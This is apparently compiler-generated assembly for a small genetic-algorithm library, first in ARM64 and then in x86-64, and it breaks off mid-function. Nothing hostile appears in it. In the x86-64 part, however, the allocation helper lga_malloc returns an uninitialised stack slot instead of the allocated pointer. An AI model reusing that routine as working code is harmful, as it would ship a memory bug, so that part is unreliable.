#2] fcmp s0, s1 cset w8, lt tbnz w8, #0, LBB15_23 b LBB15_22 LBB15_22: b LBB15_25 LBB15_23: ; in Loop: Header=BB15_20 Depth=1 b LBB15_24 LBB15_24: ; in Loop: Header=BB15_20 Depth=1 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB15_20 LBB15_25: mov w8, #15 str w8, [sp, #12] b LBB15_26 LBB15_26: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] ldr w9, [sp, #16] subs w8, w8, w9 cset w8, le tbnz w8, #0, LBB15_29 b LBB15_27 LBB15_27: ; in Loop: Header=BB15_26 Depth=1 adrp x8, _lga_ctx@PAGE ldr x9, [x8, _lga_ctx@PAGEOFF] add x9, x9, #56 ldr w10, [sp, #12] subs w10, w10, #1 ldr s0, [x9, w10, sxtw #2] ldr x9, [x8, _lga_ctx@PAGEOFF] add x9, x9, #56 ldrsw x10, [sp, #12] str s0, [x9, x10, lsl #2] ldr x9, [x8, _lga_ctx@PAGEOFF] add x9, x9, #120 ldr w10, [sp, #12] subs w10, w10, #1 ldr s0, [x9, w10, sxtw #2] ldr x8, [x8, _lga_ctx@PAGEOFF] add x8, x8, #120 ldrsw x9, [sp, #12] str s0, [x8, x9, lsl #2] b LBB15_28 LBB15_28: ; in Loop: Header=BB15_26 Depth=1 ldr w8, [sp, #12] subs w8, w8, #1 str w8, [sp, #12] b LBB15_26 LBB15_29: ldur s0, [x29, #-4] adrp x8, _lga_ctx@PAGE ldr x9, [x8, _lga_ctx@PAGEOFF] add x9, x9, #56 ldrsw x10, [sp, #16] str s0, [x9, x10, lsl #2] ldr x9, [x8, _lga_ctx@PAGEOFF] ldr s0, [x9, #52] ldr x8, [x8, _lga_ctx@PAGEOFF] add x8, x8, #120 ldrsw x9, [sp, #16] str s0, [x8, x9, lsl #2] ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _lga_insert ; -- Begin function lga_insert .p2align 2 _lga_insert: ; @lga_insert .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] stur s0, [x29, #-12] adrp x9, _lga_ctx@PAGE ldr x8, [x9, _lga_ctx@PAGEOFF] ldr w8, [x8, #32] str w8, [sp, #16] ldr x8, [x9, _lga_ctx@PAGEOFF] ldr w8, [x8, #32] add w8, w8, #1 ldr x10, [x9, _lga_ctx@PAGEOFF] ldr w11, [x10, #44] sdiv w10, w8, w11 mul w10, w10, w11 subs w8, w8, w10 ldr x10, [x9, _lga_ctx@PAGEOFF] str w8, [x10, #32] ldr x8, [x9, _lga_ctx@PAGEOFF] ldr w8, [x8, #36] ldr x9, [x9, _lga_ctx@PAGEOFF] ldr w9, [x9, #44] subs w8, w8, w9 cset w8, lt tbnz w8, #0, LBB16_2 b LBB16_1 LBB16_1: ldr w0, [sp, #16] bl _lga_remove_idx b LBB16_2 LBB16_2: str wzr, [sp, #12] b LBB16_3 LBB16_3: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #12] adrp x9, _lga_ctx@PAGE ldr x9, [x9, _lga_ctx@PAGEOFF] ldr w9, [x9, #40] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB16_6 b LBB16_4 LBB16_4: ; in Loop: Header=BB16_3 Depth=1 ldur x8, [x29, #-8] ldrsw x9, [sp, #12] ldr s0, [x8, x9, lsl #2] adrp x10, _lga_ctx@PAGE ldr x8, [x10, _lga_ctx@PAGEOFF] ldr x8, [x8] ldr w9, [sp, #16] ldr x10, [x10, _lga_ctx@PAGEOFF] ldr w10, [x10, #40] mul w9, w9, w10 ldr w10, [sp, #12] add w9, w9, w10 str s0, [x8, w9, sxtw #2] b LBB16_5 LBB16_5: ; in Loop: Header=BB16_3 Depth=1 ldr w8, [sp, #12] add w8, w8, #1 str w8, [sp, #12] b LBB16_3 LBB16_6: adrp x8, _lga_ctx@PAGE ldr x8, [x8, _lga_ctx@PAGEOFF] ldr w8, [x8, #48] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB16_8 b LBB16_7 LBB16_7: ldur s0, [x29, #-12] ldr w0, [sp, #16] bl _lga_insert_idx_max b LBB16_9 LBB16_8: ldur s0, [x29, #-12] ldr w0, [sp, #16] bl _lga_insert_idx_min b LBB16_9 LBB16_9: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .globl _lga_populate ; -- Begin function lga_populate .p2align 2 _lga_populate: ; @lga_populate .cfi_startproc ; %bb.0: sub sp, sp, #48 .cfi_def_cfa_offset 48 stp x29, x30, [sp, #32] ; 16-byte Folded Spill add x29, sp, #32 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur s0, [x29, #-4] adrp x8, _lga_ctx@PAGE ldr x8, [x8, _lga_ctx@PAGEOFF] ldr w8, [x8, #48] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB17_2 b LBB17_1 LBB17_1: mov w8, #54437 movk w8, #54120, lsl #16 fmov s0, w8 str s0, [sp, #12] b LBB17_3 LBB17_2: mov w8, #54437 movk w8, #21352, lsl #16 fmov s0, w8 str s0, [sp, #12] b LBB17_3 LBB17_3: b LBB17_4 LBB17_4: ; =>This Loop Header: Depth=1 ; Child Loop BB17_6 Depth 2 adrp x9, _lga_ctx@PAGE ldr x8, [x9, _lga_ctx@PAGEOFF] ldr w8, [x8, #36] ldr x9, [x9, _lga_ctx@PAGEOFF] ldr w9, [x9, #44] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB17_10 b LBB17_5 LBB17_5: ; in Loop: Header=BB17_4 Depth=1 adrp x9, _lga_ctx@PAGE ldr x8, [x9, _lga_ctx@PAGEOFF] ldr w8, [x8, #32] stur w8, [x29, #-12] ldr x8, [x9, _lga_ctx@PAGEOFF] ldr w8, [x8, #32] add w8, w8, #1 ldr x10, [x9, _lga_ctx@PAGEOFF] ldr w11, [x10, #44] sdiv w10, w8, w11 mul w10, w10, w11 subs w8, w8, w10 ldr x9, [x9, _lga_ctx@PAGEOFF] str w8, [x9, #32] str wzr, [sp, #16] b LBB17_6 LBB17_6: ; Parent Loop BB17_4 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #16] adrp x9, _lga_ctx@PAGE ldr x9, [x9, _lga_ctx@PAGEOFF] ldr w9, [x9, #40] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB17_9 b LBB17_7 LBB17_7: ; in Loop: Header=BB17_6 Depth=2 bl _lga_ssqrrand ldur s1, [x29, #-4] fmul s0, s0, s1 adrp x10, _lga_ctx@PAGE ldr x8, [x10, _lga_ctx@PAGEOFF] ldr x8, [x8] ldur w9, [x29, #-12] ldr x10, [x10, _lga_ctx@PAGEOFF] ldr w10, [x10, #40] mul w9, w9, w10 ldr w10, [sp, #16] add w9, w9, w10 str s0, [x8, w9, sxtw #2] b LBB17_8 LBB17_8: ; in Loop: Header=BB17_6 Depth=2 ldr w8, [sp, #16] add w8, w8, #1 str w8, [sp, #16] b LBB17_6 LBB17_9: ; in Loop: Header=BB17_4 Depth=1 adrp x9, _lga_ctx@PAGE ldr x11, [x9, _lga_ctx@PAGEOFF] ldr w8, [x11, #36] add w10, w8, #1 str w10, [x11, #36] stur w8, [x29, #-8] ldr s0, [sp, #12] ldr x8, [x9, _lga_ctx@PAGEOFF] ldr x8, [x8, #16] ldursw x10, [x29, #-8] str s0, [x8, x10, lsl #2] ldur w8, [x29, #-12] ldr x9, [x9, _lga_ctx@PAGEOFF] ldr x9, [x9, #24] ldursw x10, [x29, #-8] str w8, [x9, x10, lsl #2] b LBB17_4 LBB17_10: ldp x29, x30, [sp, #32] ; 16-byte Folded Reload add sp, sp, #48 ret .cfi_endproc ; -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ; -- Begin function lga_breed lCPI18_0: .quad 0x3f847ae147ae147b ; double 0.01 .section __TEXT,__text,regular,pure_instructions .globl _lga_breed .p2align 2 _lga_breed: ; @lga_breed .cfi_startproc ; %bb.0: sub sp, sp, #112 .cfi_def_cfa_offset 112 stp x29, x30, [sp, #96] ; 16-byte Folded Spill add x29, sp, #96 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 stur x0, [x29, #-8] adrp x8, _lga_ctx@PAGE ldr x8, [x8, _lga_ctx@PAGEOFF] subs x8, x8, #0 cset w8, ne tbnz w8, #0, LBB18_2 b LBB18_1 LBB18_1: b LBB18_20 LBB18_2: adrp x8, _lga_ctx@PAGE ldr x8, [x8, _lga_ctx@PAGEOFF] ldr w8, [x8, #36] subs w8, w8, #16 cset w8, ge tbnz w8, #0, LBB18_8 b LBB18_3 LBB18_3: stur wzr, [x29, #-12] b LBB18_4 LBB18_4: ; =>This Inner Loop Header: Depth=1 ldur w8, [x29, #-12] adrp x9, _lga_ctx@PAGE ldr x9, [x9, _lga_ctx@PAGEOFF] ldr w9, [x9, #40] subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB18_7 b LBB18_5 LBB18_5: ; in Loop: Header=BB18_4 Depth=1 bl _lga_ssqrrand fmov s1, #10.00000000 fmul s0, s0, s1 ldur x8, [x29, #-8] ldursw x9, [x29, #-12] str s0, [x8, x9, lsl #2] b LBB18_6 LBB18_6: ; in Loop: Header=BB18_4 Depth=1 ldur w8, [x29, #-12] add w8, w8, #1 stur w8, [x29, #-12] b LBB18_4 LBB18_7: b LBB18_20 LBB18_8: adrp x8, _lga_ctx@PAGE ldr x8, [x8, _lga_ctx@PAGEOFF] ldr w8, [x8, #48] subs w8, w8, #0 cset w8, eq tbnz w8, #0, LBB18_14 b LBB18_9 LBB18_9: bl _lga_sqrrand fmov s1, #4.00000000 str s1, [sp, #44] ; 4-byte Folded Spill fmul s0, s0, s1 fcvtzs w8, s0 stur w8, [x29, #-12] bl _lga_sqrrand ldr s1, [sp, #44] ; 4-byte Folded Reload fmul s0, s0, s1 fcvtzs w8, s0 stur w8, [x29, #-16] adrp x8, _lga_ctx@PAGE stur x8, [x29, #-40] ; 8-byte Folded Spill ldr x9, [x8, _lga_ctx@PAGEOFF] add x9, x9, #120 ldursw x10, [x29, #-12] ldr s0, [x9, x10, lsl #2] ldr x8, [x8, _lga_ctx@PAGEOFF] add x8, x8, #120 ldursw x9, [x29, #-16] ldr s1, [x8, x9, lsl #2] fadd s0, s0, s1 fcvt d0, s0 fmov d1, #0.50000000 fmul d0, d0, d1 fcvt s0, d0 stur s0, [x29, #-24] ldur s0, [x29, #-24] fcvt d0, s0 str d0, [sp, #48] ; 8-byte Folded Spill bl _lga_sfrand ldr d2, [sp, #48] ; 8-byte Folded Reload ldur x8, [x29, #-40] ; 8-byte Folded Reload fcvt d0, s0 adrp x9, lCPI18_0@PAGE ldr d1, [x9, lCPI18_0@PAGEOFF] fmul d0, d0, d1 ldur s1, [x29, #-24] fcvt d1, s1 fmadd d0, d0, d1, d2 fcvt s0, d0 stur s0, [x29, #-24] ldr x8, [x8, _lga_ctx@PAGEOFF] ldr s0, [x8, #52] ldur s1, [x29, #-24] fadd s0, s0, s1 fmov s1, #2.00000000 fdiv s0, s0, s1 stur s0, [x29, #-32] ldur s0, [x29, #-32] fcmp s0, #0.0 cset w8, pl tbnz w8, #0, LBB18_11 b LBB18_10 LBB18_10: movi d0, #0000000000000000 stur s0, [x29, #-32] b LBB18_11 LBB18_11: ldur s0, [x29, #-32] fmov s1, #1.00000000 fcmp s0, s1 cset w8, le tbnz w8, #0, LBB18_13 b LBB18_12 LBB18_12: fmov s0, #1.00000000 stur s0, [x29, #-32] b LBB18_13 LBB18_13: ldur s0, [x29, #-32] adrp x8, _lga_ctx@PAGE ldr x8, [x8, _lga_ctx@PAGEOFF] str s0, [x8, #52] b LBB18_19 LBB18_14: bl _lga_sqrrand fmov s1, #4.00000000 str s1, [sp, #20] ; 4-byte Folded Spill fmul s0, s0, s1 fcvtzs w8, s0 stur w8, [x29, #-12] bl _lga_sqrrand ldr s1, [sp, #20] ; 4-byte Folded Reload fmul s0, s0, s1 fcvtzs w8, s0 stur w8, [x29, #-16] adrp x8, _lga_ctx@PAGE str x8, [sp, #32] ; 8-byte Folded Spill ldr x9, [x8, _lga_ctx@PAGEOFF] add x9, x9, #120 ldursw x10, [x29, #-12] ldr s0, [x9, x10, lsl #2] ldr x8, [x8, _lga_ctx@PAGEOFF] add x8, x8, #120 ldursw x9, [x29, #-16] ldr s1, [x8, x9, lsl #2] fadd s0, s0, s1 fcvt d0, s0 fmov d1, #0.50000000 fmul d0, d0, d1 fcvt s0, d0 stur s0, [x29, #-24] ldur s0, [x29, #-24] fcvt d0, s0 str d0, [sp, #24] ; 8-byte Folded Spill bl _lga_sfrand ldr d2, [sp, #24] ; 8-byte Folded Reload ldr x8, [sp, #32] ; 8-byte Folded Reload fcvt d0, s0 adrp x9, lCPI18_0@PAGE ldr d1, [x9, lCPI18_0@PAGEOFF] fmul d0, d0, d1 ldur s1, [x29, #-24] fcvt d1, s1 fmadd d0, d0, d1, d2 fcvt s0, d0 stur s0, [x29, #-24] ldr x8, [x8, _lga_ctx@PAGEOFF] ldr s0, [x8, #52] ldur s1, [x29, #-24] fadd s0, s0, s1 fmov s1, #2.00000000 fdiv s0, s0, s1 stur s0, [x29, #-32] ldur s0, [x29, #-32] fcmp s0, #0.0 cset w8, pl tbnz w8, #0, LBB18_16 b LBB18_15 LBB18_15: movi d0, #0000000000000000 stur s0, [x29, #-32] b LBB18_16 LBB18_16: ldur s0, [x29, #-32] fmov s1, #1.00000000 fcmp s0, s1 cset w8, le tbnz w8, #0, LBB18_18 b LBB18_17 LBB18_17: fmov s0, #1.00000000 stur s0, [x29, #-32] b LBB18_18 LBB18_18: ldur s0, [x29, #-32] adrp x8, _lga_ctx@PAGE ldr x8, [x8, _lga_ctx@PAGEOFF] str s0, [x8, #52] b LBB18_19 LBB18_19: bl _lga_sqrrand adrp x8, _lga_ctx@PAGE str x8, [sp, #8] ; 8-byte Folded Spill ldr x8, [x8, _lga_ctx@PAGEOFF] ldr w8, [x8, #36] mov w9, #16 str w9, [sp, #4] ; 4-byte Folded Spill sdiv w8, w8, w9 scvtf s1, w8 fmul s0, s0, s1 fcvtzs w8, s0 stur w8, [x29, #-12] bl _lga_sqrrand ldr w10, [sp, #4] ; 4-byte Folded Reload ldr x8, [sp, #8] ; 8-byte Folded Reload ldr x9, [x8, _lga_ctx@PAGEOFF] ldr w9, [x9, #36] sdiv w9, w9, w10 scvtf s1, w9 fmul s0, s0, s1 fcvtzs w9, s0 stur w9, [x29, #-16] ldr x9, [x8, _lga_ctx@PAGEOFF] ldr x9, [x9, #24] ldursw x10, [x29, #-12] ldr w9, [x9, x10, lsl #2] stur w9, [x29, #-12] ldr x9, [x8, _lga_ctx@PAGEOFF] ldr x9, [x9, #24] ldursw x10, [x29, #-16] ldr w9, [x9, x10, lsl #2] stur w9, [x29, #-16] ldr x9, [x8, _lga_ctx@PAGEOFF] ldr w9, [x9, #40] stur w9, [x29, #-20] ldr x9, [x8, _lga_ctx@PAGEOFF] ldr x9, [x9] ldur w10, [x29, #-12] ldur w11, [x29, #-20] mul w10, w10, w11 add x0, x9, w10, sxtw #2 ldr x8, [x8, _lga_ctx@PAGEOFF] ldr x8, [x8] ldur w9, [x29, #-16] ldur w10, [x29, #-20] mul w9, w9, w10 add x1, x8, w9, sxtw #2 ldur x2, [x29, #-8] ldur w3, [x29, #-20] ldur s0, [x29, #-32] bl _lga_breed_raw b LBB18_20 LBB18_20: ldp x29, x30, [sp, #96] ; 16-byte Folded Reload add sp, sp, #112 ret .cfi_endproc ; -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ; -- Begin function main lCPI19_0: .quad 0x4050000000000000 ; double 64 lCPI19_1: .quad 0x401921fb54442d18 ; double 6.2831853071795862 lCPI19_2: .quad 0x3f1a36e2eb1c432d ; double 1.0E-4 .section __TEXT,__text,regular,pure_instructions .globl _main .p2align 2 _main: ; @main .cfi_startproc ; %bb.0: sub sp, sp, #352 .cfi_def_cfa_offset 352 stp x28, x27, [sp, #320] ; 16-byte Folded Spill stp x29, x30, [sp, #336] ; 16-byte Folded Spill add x29, sp, #336 .cfi_def_cfa w29, 16 .cfi_offset w30, -8 .cfi_offset w29, -16 .cfi_offset w27, -24 .cfi_offset w28, -32 adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] stur x8, [x29, #-24] str wzr, [sp, #52] mov w0, #4096 mov w1, #64 bl _lga_newctx fmov s0, #10.00000000 bl _lga_populate str wzr, [sp, #36] b LBB19_1 LBB19_1: ; =>This Loop Header: Depth=1 ; Child Loop BB19_3 Depth 2 ldr w8, [sp, #36] mov w9, #16777216 subs w8, w8, w9 cset w8, ge tbnz w8, #0, LBB19_12 b LBB19_2 LBB19_2: ; in Loop: Header=BB19_1 Depth=1 add x0, sp, #56 bl _lga_breed movi d0, #0000000000000000 str s0, [sp, #48] str wzr, [sp, #32] b LBB19_3 LBB19_3: ; Parent Loop BB19_1 Depth=1 ; => This Inner Loop Header: Depth=2 ldr w8, [sp, #32] subs w8, w8, #64 cset w8, ge tbnz w8, #0, LBB19_6 b LBB19_4 LBB19_4: ; in Loop: Header=BB19_3 Depth=2 ldr s1, [sp, #32] ; implicit-def: $d0 fmov s0, s1 sshll.2d v0, v0, #0 ; kill: def $d0 killed $d0 killed $q0 scvtf d1, d0 adrp x8, lCPI19_1@PAGE ldr d0, [x8, lCPI19_1@PAGEOFF] fmul d0, d0, d1 adrp x8, lCPI19_0@PAGE ldr d1, [x8, lCPI19_0@PAGEOFF] fdiv d0, d0, d1 bl _sin fcvt s0, d0 str s0, [sp, #44] ldrsw x9, [sp, #32] add x8, sp, #56 ldr s0, [x8, x9, lsl #2] ldr s1, [sp, #44] fsub s0, s0, s1 fcvt d0, s0 fabs d1, d0 ldr s0, [sp, #48] fcvt d0, s0 fadd d0, d0, d1 fcvt s0, d0 str s0, [sp, #48] b LBB19_5 LBB19_5: ; in Loop: Header=BB19_3 Depth=2 ldr w8, [sp, #32] add w8, w8, #1 str w8, [sp, #32] b LBB19_3 LBB19_6: ; in Loop: Header=BB19_1 Depth=1 ldr s0, [sp, #48] add x0, sp, #56 bl _lga_insert ldr w8, [sp, #36] mov w10, #1024 sdiv w9, w8, w10 mul w9, w9, w10 subs w8, w8, w9 subs w8, w8, #0 cset w8, ne tbnz w8, #0, LBB19_8 b LBB19_7 LBB19_7: ; in Loop: Header=BB19_1 Depth=1 ldr w8, [sp, #36] ; implicit-def: $x9 mov x9, x8 ldr s0, [sp, #48] fcvt d1, s0 adrp x8, _lga_ctx@PAGE ldr x8, [x8, _lga_ctx@PAGEOFF] ldr s0, [x8, #52] fcvt d0, s0 mov x8, sp str x9, [x8] str d1, [x8, #8] str d0, [x8, #16] adrp x0, l_.str@PAGE add x0, x0, l_.str@PAGEOFF bl _printf adrp x8, ___stdoutp@GOTPAGE ldr x8, [x8, ___stdoutp@GOTPAGEOFF] ldr x0, [x8] bl _fflush b LBB19_8 LBB19_8: ; in Loop: Header=BB19_1 Depth=1 ldr s0, [sp, #48] fcvt d0, s0 adrp x8, lCPI19_2@PAGE ldr d1, [x8, lCPI19_2@PAGEOFF] fcmp d0, d1 cset w8, pl tbnz w8, #0, LBB19_10 b LBB19_9 LBB19_9: b LBB19_12 LBB19_10: ; in Loop: Header=BB19_1 Depth=1 b LBB19_11 LBB19_11: ; in Loop: Header=BB19_1 Depth=1 ldr w8, [sp, #36] add w8, w8, #1 str w8, [sp, #36] b LBB19_1 LBB19_12: adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf str wzr, [sp, #32] b LBB19_13 LBB19_13: ; =>This Inner Loop Header: Depth=1 ldr w8, [sp, #32] subs w8, w8, #64 cset w8, ge tbnz w8, #0, LBB19_16 b LBB19_14 LBB19_14: ; in Loop: Header=BB19_13 Depth=1 ldrsw x9, [sp, #32] add x8, sp, #56 ldr s0, [x8, x9, lsl #2] fcvt d0, s0 mov x8, sp str d0, [x8] adrp x0, l_.str.2@PAGE add x0, x0, l_.str.2@PAGEOFF bl _printf b LBB19_15 LBB19_15: ; in Loop: Header=BB19_13 Depth=1 ldr w8, [sp, #32] add w8, w8, #1 str w8, [sp, #32] b LBB19_13 LBB19_16: adrp x0, l_.str.1@PAGE add x0, x0, l_.str.1@PAGEOFF bl _printf ldr w8, [sp, #52] str w8, [sp, #28] ; 4-byte Folded Spill ldur x9, [x29, #-24] adrp x8, ___stack_chk_guard@GOTPAGE ldr x8, [x8, ___stack_chk_guard@GOTPAGEOFF] ldr x8, [x8] subs x8, x8, x9 cset w8, eq tbnz w8, #0, LBB19_18 b LBB19_17 LBB19_17: bl ___stack_chk_fail LBB19_18: ldr w0, [sp, #28] ; 4-byte Folded Reload ldp x29, x30, [sp, #336] ; 16-byte Folded Reload ldp x28, x27, [sp, #320] ; 16-byte Folded Reload add sp, sp, #352 ret .cfi_endproc ; -- End function .globl _lga_ctx_arr ; @lga_ctx_arr .zerofill __DATA,__common,_lga_ctx_arr,8,3 .globl _lga_ctx ; @lga_ctx .zerofill __DATA,__common,_lga_ctx,8,3 .comm _lga_nctx,4,2 ; @lga_nctx .section __TEXT,__cstring,cstring_literals l_.str: ; @.str .asciz "%d %f %f \r" l_.str.1: ; @.str.1 .asciz "\n" l_.str.2: ; @.str.2 .asciz "%f " .subsections_via_symbols
.section __TEXT,__text,regular,pure_instructions .build_version macos, 13, 0 sdk_version 13, 3 .globl _lga_ssqrt ## -- Begin function lga_ssqrt .p2align 4, 0x90 _lga_ssqrt: ## @lga_ssqrt .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp movss %xmm0, -8(%rbp) xorps %xmm0, %xmm0 ucomiss -8(%rbp), %xmm0 jbe LBB0_2 ## %bb.1: movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero movd %xmm0, %eax xorl $2147483648, %eax ## imm = 0x80000000 movd %eax, %xmm0 cvtss2sd %xmm0, %xmm0 sqrtsd %xmm0, %xmm0 movq %xmm0, %rax movabsq $-9223372036854775808, %rcx ## imm = 0x8000000000000000 xorq %rcx, %rax movq %rax, %xmm0 cvtsd2ss %xmm0, %xmm0 movss %xmm0, -4(%rbp) jmp LBB0_3 LBB0_2: movss -8(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero cvtss2sd %xmm0, %xmm0 sqrtsd %xmm0, %xmm0 cvtsd2ss %xmm0, %xmm0 movss %xmm0, -4(%rbp) LBB0_3: movss -4(%rbp), %xmm0 ## xmm0 = mem[0],zero,zero,zero popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal4,4byte_literals .p2align 2 ## -- Begin function lga_nfrand LCPI1_0: .long 0x4f000000 ## float 2.14748365E+9 .section __TEXT,__text,regular,pure_instructions .globl _lga_nfrand .p2align 4, 0x90 _lga_nfrand: ## @lga_nfrand .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp callq _rand cvtsi2ss %eax, %xmm0 movss LCPI1_0(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero divss %xmm1, %xmm0 popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ## -- Begin function lga_sfrand LCPI2_0: .quad 0x3ff0000000000000 ## double 1 LCPI2_1: .quad 0x41cfffffffc00000 ## double 1073741823.5 .section __TEXT,__text,regular,pure_instructions .globl _lga_sfrand .p2align 4, 0x90 _lga_sfrand: ## @lga_sfrand .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp callq _rand cvtsi2sd %eax, %xmm0 movsd LCPI2_1(%rip), %xmm1 ## xmm1 = mem[0],zero divsd %xmm1, %xmm0 movsd LCPI2_0(%rip), %xmm1 ## xmm1 = mem[0],zero subsd %xmm1, %xmm0 cvtsd2ss %xmm0, %xmm0 popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ## -- Begin function lga_sqrrand LCPI3_0: .quad 0x4070000000000000 ## double 256 .section __TEXT,__literal4,4byte_literals .p2align 2 LCPI3_1: .long 0x47800000 ## float 65536 .section __TEXT,__text,regular,pure_instructions .globl _lga_sqrrand .p2align 4, 0x90 _lga_sqrrand: ## @lga_sqrrand .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp callq _lga_nfrand movss LCPI3_1(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero mulss %xmm1, %xmm0 cvtss2sd %xmm0, %xmm0 sqrtsd %xmm0, %xmm0 movsd LCPI3_0(%rip), %xmm1 ## xmm1 = mem[0],zero divsd %xmm1, %xmm0 cvtsd2ss %xmm0, %xmm0 popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal4,4byte_literals .p2align 2 ## -- Begin function lga_ssqrrand LCPI4_0: .long 0x43800000 ## float 256 LCPI4_1: .long 0x47800000 ## float 65536 .section __TEXT,__text,regular,pure_instructions .globl _lga_ssqrrand .p2align 4, 0x90 _lga_ssqrrand: ## @lga_ssqrrand .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp callq _lga_sfrand movss LCPI4_1(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero mulss %xmm1, %xmm0 callq _lga_ssqrt movss LCPI4_0(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero divss %xmm1, %xmm0 popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal8,8byte_literals .p2align 3 ## -- Begin function lga_logrand LCPI5_0: .quad 0x4030000000000000 ## double 16 .section __TEXT,__literal4,4byte_literals .p2align 2 LCPI5_1: .long 0x477fff00 ## float 65535 LCPI5_2: .long 0x3f800000 ## float 1 .section __TEXT,__text,regular,pure_instructions .globl _lga_logrand .p2align 4, 0x90 _lga_logrand: ## @lga_logrand .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp callq _lga_nfrand movss LCPI5_1(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero mulss %xmm1, %xmm0 movss LCPI5_2(%rip), %xmm1 ## xmm1 = mem[0],zero,zero,zero addss %xmm1, %xmm0 cvtss2sd %xmm0, %xmm0 callq _log2 movsd LCPI5_0(%rip), %xmm1 ## xmm1 = mem[0],zero divsd %xmm1, %xmm0 cvtsd2ss %xmm0, %xmm0 popq %rbp retq .cfi_endproc ## -- End function .globl _lga_malloc ## -- Begin function lga_malloc .p2align 4, 0x90 _lga_malloc: ## @lga_malloc .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl %edi, -12(%rbp) movslq -12(%rbp), %rdi callq _malloc movq %rax, -24(%rbp) movq -24(%rbp), %rdi movslq -12(%rbp), %rdx xorl %esi, %esi movq $-1, %rcx callq ___memset_chk movq -8(%rbp), %rax addq $32, %rsp popq %rbp retq .cfi_endproc ## -- End function .globl _lga_realloc ## -- Begin function lga_realloc .p2align 4, 0x90 _lga_realloc: ## @lga_realloc .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $16, %rsp movq %rdi, -8(%rbp) movl %esi, -12(%rbp) movq -8(%rbp), %rdi movslq -12(%rbp), %rsi callq _realloc addq $16, %rsp popq %rbp retq .cfi_endproc ## -- End function .section __TEXT,__literal4,4byte_literals .p2align 2 ## -- Begin function lga_newctx LCPI8_0: .long 0x3f800000 ## float 1 LCPI8_1: .long 0x5368d4a5 ## float 9.99999995E+11 .section __TEXT,__text,regular,pure_instructions .globl _lga_newctx .p2align 4, 0x90 _lga_newctx: ## @lga_newctx .cfi_startproc ## %bb.0: pushq %rbp .cfi_def_cfa_offset 16 .cfi_offset %rbp, -16 movq %rsp, %rbp .cfi_def_cfa_register %rbp subq $32, %rsp movl %edi, -8(%rbp) movl %esi, -12(%rbp) movl $184, -20(%rbp) movl $8, -24(%rbp) movl -20(%rbp), %edi callq _lga_malloc movq %rax, _lga_ctx(%rip) movl -8(%rbp), %ecx movq _lga_ctx(%rip), %rax movl %ecx, 44(%rax) movl -12(%rbp), %ecx movq _lga_ctx(%rip), %rax movl %ecx, 40(%rax) movq _lga_ctx(%rip), %rax movss LCPI8_0(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero movss %xmm0, 52(%rax) movl $0, -16(%rbp) LBB8_1: ## =>This Inner Loop Header: Depth=1 cmpl $16, -16(%rbp) jge LBB8_4 ## %bb.2: ## in Loop: Header=BB8_1 Depth=1 movq _lga_ctx(%rip), %rax movslq -16(%rbp), %rcx movss LCPI8_1(%rip), %xmm0 ## xmm0 = mem[0],zero,zero,zero movss %xmm0, 56(%rax,%rcx,4) movq _lga_ctx(%rip), %rax movslq -16(%rbp), %rcx movss LCPI8_0(%rip), %xmm0 ## xmm0 = 